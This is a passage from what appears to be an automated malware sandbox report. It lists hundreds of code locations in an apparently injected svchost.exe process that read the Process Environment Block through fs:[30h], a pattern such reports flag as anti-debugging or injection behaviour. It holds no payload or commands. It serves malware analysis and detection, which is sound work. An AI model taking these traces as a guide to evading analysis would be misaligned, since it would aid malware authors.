                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
